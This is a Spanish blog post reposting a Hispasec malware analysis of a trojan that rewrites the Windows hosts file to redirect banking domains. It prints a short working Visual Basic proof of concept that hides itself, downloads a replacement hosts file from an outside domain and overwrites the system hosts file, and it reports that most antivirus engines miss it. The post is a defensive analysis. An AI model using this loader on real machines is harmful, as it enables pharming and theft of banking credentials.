Ir al contenido principal

Un modificador de hosts sencillo evita la detección de los antivirus

De


Una parte importante de los troyanos realizan acciones de modificación del archivo hosts, son los conocidos como "modificadores de hosts" o como "host modifier". Durante el análisis de un malware de este tipo en nuestro laboratorio, y con gran sorpresa, observamos que no fue detectado por ningún antivirus. Lo hemos analizado para ver su código malicioso y comprender por qué no fue detectado.
  
Dentro del departamento antifraude de Hispasec, una de las acciones que solemos realizar diariamente es el análisis de malware que afecta a los clientes de las entidades bancarias suscriptoras de nuestros servicios antifraude. Estamos acostumbrados a tratar con múltiples muestras, aunque generalmente solemos encontrar versiones de las familias más habituales. Sin embargo, de vez en cuando, encontramos alguna muestra que nos sorprende por no ser detectada por antivirus, aportar alguna técnica novedosa, etc.
El análisis de esta nueva muestra (con hash
ecc58e97f64ca42fe638e499a2ad7f50a3008f30f071cecb71b2c223d7d8d1ac) nos permitió observar que realizaba una modificación del hosts pero no empleaba ningún mecanismo de ofuscacion o poliformismo. Esto nos sorprendió, ya que una acción como la de modificar el archivo hosts debería ser detectado por al menos un buen número de antivirus. Actualmente esta muestra es detectada por 12 de 47 antivirus.

Un "HostModifier" es un modificador del archivo hosts. El archivo hosts contiene la correspondencia entre el nombre de un dominio y su dirección IP. Cuando Windows resuelve la dirección IP, va a consultar primero el archivo host y si el dominio no está dentro, hace una petición al servidor DNS para recoger la dirección IP.
Un atacante puede modificar el archivo hosts para redireccionar los dominios reales a dominios fraudulentos. Este ataque se utiliza para robar datos como, por ejemplo credenciales bancarias. Además, este ataque es más sencillo de realizar para robar datos y credenciales, comparado con otras familias más elaboradas y complejas como Zeus, Citadel, SpyEye, etc.
Para explicar las funcionalidades del "host modifier", hemos creado una versión más sencilla con solo la parte maliciosa. Esperamos que sirva también de ayuda para los analistas de malware y laboratorios antivirus. La lógica del programa es la siguiente: (1) se esconde del usuario, (2) recoge el archivo hosts de un servidor a distancia, (3) re-escribe el actual archivo hosts, y (4) termina su ejecución. Más sencillo imposible.
Código fuente:
Private Sub Form_Load()
    Dim oHTTP As Object
    Dim oADOStream As Object
   ' Ofuscación del programa
   Me.Hide
   
    'Descarga el archivo hosts
    Set oHTTP = CreateObject("Microsoft.XMLHTTP")
   
    oHTTP.Open "GET", "http://bwjdwqh.com/ht.txt", False
    oHTTP.Send
    'Re-escribe el archivo hosts
    Set oADOStream = CreateObject("Adodb.Stream")
    oADOStream.Type = 1
    oADOStream.Mode = 3
    oADOStream.Open
    oADOStream.Write oHTTP.responseBody
    oADOStream.SaveToFile CStr(Environ("WINDIR") & "\\system32\\drivers\\etc\\hosts"), 2
    oADOStream.Close
   
    'Detiene el programa
    End
End Sub
Este código, como prueba de concepto, lo hemos subido a VirusTotal para comprobar los resultados de los análisis de los antivirus. De los 48 antivirus, solo uno, McAfee-GW-Edition, lo ha detectado como sospechoso. Curioso que este mismo antivirus en cambio detecte como malware todos los programas VisualBasic sin línea de programación dentro.
https://www.virustotal.com/es/file/f708a2133b3b9fae65adb7ff152853a2e4ede857d8912567210d9606a5cec8e5/analysis/1379951161/
Queremos subrayar la importancia de mantener actualizado el antivirus, así como prestar atención a las alertas de análisis heurístico de comportamientos maliciosos.
Más informacion:
Hash del programa compilado
SHA256: f708a2133b3b9fae65adb7ff152853a2e4ede857d8912567210d9606a5
Análisis de los antivirus:
https://www.virustotal.com/en/file/f708a2133b3b9fae65adb7ff152853a2e4ede857d8912567210d9606a5cec8e5/analysis/1379951161/
Análisis muestra original:
https://www.virustotal.com/es/file/ecc58e97f64ca42fe638e499a2ad7f50a3008f30f071cecb71b2c223d7d8d1ac/analysis/

Fuente:
http://unaaldia.hispasec.com/2013/09/un-modificador-de-hosts-sencillo-evita.html

Conclusiones

Tomar en cuenta este articulo y nunca confiarse en un determinado antivirus. La pregunta más complicada que siempre les van a hacer es.

¿ Y cual es el mejor antivirus? Por allí alguno te responderá con marca X o Y  pero quien responde esto o le dan una comision por recomendarlo o no sabe nada, pues como hemos visto.. es posible que programemos un programa "malito" y como es relativamente nuevo para el mundo al principio pasara desapercibido.

Todavía peor cuando alguien te dice pues.. es que si tienes cuidado y no te bajas cosas y un poco de sentido común estas hecho todavía sabe menos el que te dice esto.

La única manera es estudiar un poco sobre como asegurar el sistema, mantener siempre actualizado el antivirus (no queda de otra) y por lo menos hasta hace seis meses Microsoft security essential se volvio una excelente alternativa por si no tienes dinero en comprar un antivirus. No es por hacerle promoción pero al ser de MS hacen uso de técnicas internas que quizas solo ellos conocen del sistema y se ha vuelto bueno.  Aunque repito hay muchas maneras de evadir los antivirus y no por estar usando uno determinado estaremos a salvo.
 
Etiquetas:

Comentarios

  1. Andrés6 de diciembre de 2013, 8:54

    Pero no entiendo como escala permisos para poder modificar el hosts?

    ResponderEliminar

Publicar un comentario

Entradas populares de este blog

Tabletas para niños corren peligro

De
Expertos avisan que las Tablets para niños pueden ser pirateadas Empresa de seguridad cibernética dice tabletas de los niños son inseguros y ponen en riesgo la seguridad tanto de niños como de los padres.   Las Tabletas de los niños tienen poca o ninguna seguridad para proteger los datos y son vulnerables a la piratería informática, una firma líder de seguridad informática, ha advertido lo siguiente: El Grupo de NCC evalúa dos tabletas  para niños que pueden estar ya incluidas en muchas listas de regalos de Navidad en ellas, se encontró que la seguridad de los niños y la privacidad está en riesgo. "Los resultados de este análisis mostraron que poco o nada de seguridad informática contienen estos dispositivos lo que pone en riesgo la privacidad del usuario del denominado "Tablet para niños", esto no solo afecta que la información del dispositivo del niño pueda ser manipulada, sino que también al adquirir estos aparatos esta usted poniendo su segurid...
1 comentario
Leer más

XKEYSCORE: Google, NSA y las Comunicaciones Privadas del Mundo - Parte I

De
Una de las más poderosas herramientas de vigilancia masiva de la Agencia de Seguridad Nacional ( NSA )  hace un seguimiento del uso de Internet de alguien tan fácil como introducir una dirección de correo electrónico, y no proporciona la tecnología incorporada al publico para evitar abusos. Hoy en día, La Intercepción publica 48 - top secret y otros documentos clasificados sobre XKEYSCORE fecha hasta 2013 , que arrojan nueva luz sobre la amplitud, la profundidad y la funcionalidad de este sistema de espionaje crítico - uno de los lanzamientos más grandes hasta ahora de los documentos proporcionados por la NSA denunciante Edward Snowden . Descripción breve sobre  XKEYSCORE XKEYSCORE  es un programa de la NSA   el cual fue revelado por el diario The Guardian , lo que hace es hacer un barrido con innumerables búsquedas en Internet de las personas, correos electrónicos, documentos, nombres de usuario y contraseñas, y otras comunicaciones privadas.  ...
Publicar un comentario
Leer más

Las Diez Mejores Reglas De Diseño Front-End Para Desarrolladores

De
Como desarrolladores Front-End, nuestro trabajo es esencialmente convertir los diseños en realidad a través del código. Comprender y ser competentes en el diseño es un componente importante de esto. Desafortunadamente, entender realmente el diseño de Front-End es más fácil a la hora de decirlo que hacerlo. La codificación y el diseño estético requieren algunos conjuntos de habilidades bastante diferentes. Debido a esto, algunos desarrolladores Front-End no son tan proficientes en el aspecto de diseño como deberían ser y como resultado, su trabajo sufre. Mi objetivo es darte algunas reglas y conceptos fáciles de seguir, desde un  desarrollador Front-End  a otro, que te ayudará a ir desde el inicio hasta el final de un proyecto sin estropear lo que tus diseñadores trabajaron tan duro (o posiblemente incluso permitirte diseñar tus propios proyectos con resultados decentes). Por supuesto, estas reglas no te llevarán de malo a magnífico en el tiempo que toma para leer un artí...
Publicar un comentario
Leer más